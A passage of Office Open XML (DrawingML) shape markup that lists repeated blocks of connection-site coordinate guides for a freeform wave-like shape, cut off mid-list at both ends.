              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 380664 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8301962 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 118969 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 380664 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 303076 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 308584 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 230996 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 266841 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1849168 h 1873242"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1836071 h 1873242"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1761010 h 1873242"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1721131 h 1873242"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1711269 h 1873242"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1664771 h 1873242"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1613983 h 1873242"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1463940 h 1873242"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1342113 h 1873242"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1279560 h 1873242"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1232464 h 1873242"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1173484 h 1873242"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1091365 h 1873242"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1027110 h 1873242"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 971180 h 1873242"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 907161 h 1873242"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 894129 h 1873242"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 759117 h 1873242"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 323672 h 1873242"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 246084 h 1873242"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 281929 h 1873242"/>
              <a:gd name="connsiteX24" fmla="*/ 8832027 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 47539 h 1873242"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 15333 h 1873242"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1849168 h 1873242"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1836071 h 1873242"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1761010 h 1873242"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1721131 h 1873242"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1711269 h 1873242"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1664771 h 1873242"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1613983 h 1873242"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1463940 h 1873242"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1342113 h 1873242"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1279560 h 1873242"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1232464 h 1873242"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1173484 h 1873242"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1091365 h 1873242"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1027110 h 1873242"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 971180 h 1873242"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 907161 h 1873242"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 894129 h 1873242"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 759117 h 1873242"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 323672 h 1873242"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 246084 h 1873242"/>
              <a:gd name="connsiteX23" fmla="*/ 8459929 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 159190 h 1873242"/>
              <a:gd name="connsiteX24" fmla="*/ 8832027 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 47539 h 1873242"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 15333 h 1873242"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8459929 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 197025 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
